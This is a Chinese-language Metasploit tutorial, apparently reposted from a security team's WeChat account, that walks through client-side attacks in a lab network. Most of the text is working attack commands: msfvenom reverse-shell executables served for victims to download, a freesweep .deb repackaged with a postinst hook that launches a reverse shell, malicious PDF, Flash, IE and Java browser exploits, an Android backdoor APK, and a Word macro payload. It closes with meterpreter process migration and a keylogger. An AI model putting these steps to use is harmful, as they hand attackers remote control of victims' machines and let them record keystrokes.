metasploit framework——客户端渗透
前言
本节学习客户端渗透
在无法突破网络边界的情况下转而攻击客户端,通过社会工程学攻击,进而渗透线上业务网络含有漏洞利用代码的 web 站点含有漏洞利用代码的 doc、pdf等文档诱骗被害者执行 payload
1、准备
目标机metasploitable IP:192.168.1.120
目标机winxp IP:192.168.1.122
目标机win7 IP:192.168.1.123
目标机ubantu IP:192.168.1.124
攻击机kali IP:192.168.1.121
2、攻击windows
kali
#生成payloadmsfvenom -a x86 --platform windows -p windows/shell/reverse_tcp LHOST=192.168.1.121 LPORT=4444 -b "x00" -e x86/shikata_ga_nai -i 9 -f exe -o 1.exe#启动apacheservice apache2 startcp 1.exe /var/www/html/#用msf侦听msfconsolemsf > use exploit/multi/handlermsf exploit(multi/handler) > set payload/windows/shell/reverse_tcpmsf exploit(multi/handler) > set LHOST 192.168.1.121msf exploit(multi/handler) > set LPORT 4444msf exploit(multi/handler) > exploit1234567891011win7浏览器打开192.168.1.121/1.exe下载并执行 kali获取win7的权限
3、攻击linux
将payload注入deb包 目标机执行deb包时反弹shell
kali
#搞个deb包apt --download-only install freesweepcd /var/cache/apt/archives #deb包在这个文件夹dpkg -x freesweep_0.90-3+b1_amd64.deb free #解包cd free/mkdir DEBIANcd DEBIAN/#创建控制文件vi controlPackage: freesweepVersion: 0.90-3Section: Games and AmusementPriority: optionalArchitecture:amd64Maintainer: Ubuntu MOTU Developers (ubuntu-motu@ lists.ubuntu.com)Description: a text-based minesweeperFreesweep isan implementation of the popular minesweeper game,whereone tries to find all the mines without igniting any, based on hints givenby the computer.Unlike most implementations of this game,Freesweepworksinanyvisualtextdispl in Linuxconsole,inanxterm,and inmost text-based terminals currently in use.#创建脚本vi postinst#!/bin/shsudo chmod 2755 /usr/games/freesweep_scores && /usr/games/freesweep_scores & /usr/games/freesweep &chmod 755 postinst#生成payloadmsfvenom -a x86 --platform linux -p linux/x86/shell/reverse_tcp LHOST=192.168.1.121 LPORT=4444 -b "x00" -f elf -o /root/free/usr/games/freesweep_scores#打包生成deb包dpkg-deb --build /root/freeservice apache2 startcp free.deb /var/www/html/#用msf侦听msfconsolemsf > use exploit/multi/handlermsf exploit(multi/handler) > set payload/linux/x86/shell/reverse_tcpmsf exploit(multi/handler) > set LHOST 192.168.1.121msf exploit(multi/handler) > set LPORT 4444msf exploit(multi/handler) > exploit12345678910111213141516171819202122232425262728293031323334ubantu 浏览器192.168.1.121/free.debdpkg -i free.deb #进行安装kali获得ubantu的shell
4、利用 Acrobat Reader 漏洞执行 payload
构造 pdf 文件
kali
msf > use exploit/windows/fileformat/adobe_utilprintfmsf exploit(adobe_utilprintf) > set payload/windows/meterpreter/reverse_tcpmsf exploit(adobe_utilprintf) > set LHOST 192.168.1.121msf exploit(adobe_utilprintf) > exploitmsf.pdf stored at /root/.msf4/local/msf.pdf #生成这么个含有payload的pdf#同样apacheservice apache2 startcp msf.pdf /var/www/html/# 开启监听msf > use exploit/multi/handlermsf exploit(multi/handler) > set payload/windows/meterpreter/reverse_tcpmsf exploit(multi/handler) > set LHOST 192.168.1.121msf exploit(multi/handler) > set LPORT 4444msf exploit(multi/handler) > exploit12345678910111213winxp 浏览器192.168.1.121/msf.pdf 打开pdf kali获得winxp的shell 这个漏洞在win7上就不行kalimsf > use exploit/windows/browser/adobe_utilprintfmsf exploit(adobe_utilprintf) > set SRVPORT 80 #网站端口,也可以8080msf exploit(adobe_utilprintf) > set URIPATH / #用根目录,防止生成一串随机字符串msf exploit(adobe_utilprintf) > set payload windows/meterpreter/reverse_tcpmsf exploit(adobe_utilprintf) > set LHOST 192.168.1.121msf exploit(adobe_utilprintf) > exploit12345:80 kali的session建立起来了 甚至可以结合地址欺骗kalimsf exploit(adobe_utilprintf) > session -i 2meterpreter > migrate 856 #把进程迁移到explorer.exe,即使win把浏览器关了,session仍在meterpreter > use priv #提权meterpreter > run post/windows/capture/keylog_recorder #启用键盘记录器123
5、利用 flash 插件漏洞执行 paylaod
msf > use exploit/multi/browser/adobe_flash_hacking_team_uafmsf exploit(adobe_flash_hacking_team_uaf) > set SRVPORT 80msf exploit(adobe_flash_hacking_team_uaf) > set URIPATH /msf exploit(adobe_flash_hacking_team_uaf) > set payload windows/meterpreter/reverse_tcpmsf exploit(adobe_flash_hacking_team_uaf) > set LHOST 192.168.1.121msf exploit(adobe_flash_hacking_team_uaf) > exploit#后面一样123456exploit/multi/browser/adobe_flash_opaque_background_uaf#这个不需要指定payload,将msf里所有相关都打包了1
6、利用 IE 浏览器漏洞执行 payload
msf > use exploit/windows/browser/ms14_064_ole_code_executionmsf exploit(ms14_064_ole_code_execution) > set SRVPORT 80msf exploit(ms14_064_ole_code_execution) > set URIPATH /msf exploit(ms14_064_ole_code_execution) > set payload windows/meterpreter/reverse_tcpmsf exploit(ms14_064_ole_code_execution) > set LHOST 192.168.1.121msf exploit(ms14_064_ole_code_execution) > exploit12345
7、利用 JRE 漏洞执行 payload
kali
msf > use exploit/multi/browser/java_jre17_driver_managermsf exploit(java_jre17_driver_manager) > set SRVPORT 80msf exploit(java_jre17_driver_manager) > set SRVHOST 192.168.1.121msf exploit(java_jre17_driver_manager) > set URIPATH /msf exploit(java_jre17_driver_manager) > set payload java/meterpreter/reverse_tcpmsf exploit(java_jre17_driver_manager) > set LHOST 192.168.1.121msf exploit(java_jre17_driver_manager) > exploit123456kali获得shell
还有一些模块如
exploit/multi/browser/java_jre17_jmxbeanexploit/multi/browser/java_jre17_reflection_types1
8、生成 android 后门程序
kali
msf > use payload/android/meterpreter/reverse_tcpmsf payload(reverse_tcp) > set LHOST 192.168.1.121msf payload(reverse_tcp) > generate -f a.apk -p android -t raw #要生成个apk# 开启监听msf > use exploit/multi/handlermsf exploit(multi/handler) > set payload/android/meterpreter/reverse_tcpmsf exploit(multi/handler) > set LHOST 192.168.1.121msf exploit(multi/handler) > set LPORT 4444msf exploit(multi/handler) > exploit12345678kali获得手机的shell和进程
9、宏感染
利用宏感染 word、except 文档 绕过某些基于文件类型检查的安全机制 这个是可以绕过win10防火墙的
生成 vbscript 脚本 kali
msfvenom -a x86 --platform windows -p windows/meterpreter/reverse_tcp LHOST=192.168.1.121 LPORT=4444 -e x86/shikata_ga_nai -f vba-exe#生成两部分内容:VBA代码和16进制payload#用msf侦听msf > use exploit/multi/handlermsf exploit(multi/handler) > set payload/windows/shell/reverse_tcpmsf exploit(multi/handler) > set LHOST 192.168.1.121msf exploit(multi/handler) > set LPORT 4444msf exploit(multi/handler) > exploit1234567windows office 2007 及以上word 视图-宏-创建 payload 第一部分粘入 VBA 代码 payload 第二部分粘入 word 正文kali获取shell
结语
msf渗透手段丰富 主要是相关模块多 不过试验主要是在老旧系统上实施
红客突击队于2019年由队长k龙牵头,联合国内多位顶尖高校研究生成立。团队从成立至今多次参加国际网络安全竞赛并取得良好成绩,积累了丰富的竞赛经验。红客突击队始终秉承先做人后技术的宗旨,旨在打造国际顶尖网络安全团队。其核心团队于2022年转型于信息安全研究院,并为政企提供安全服务与技术支持。
© Honker Security Commando
原文始发于微信公众号(中龙 红客突击队):metasploit framework——客户端渗透
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论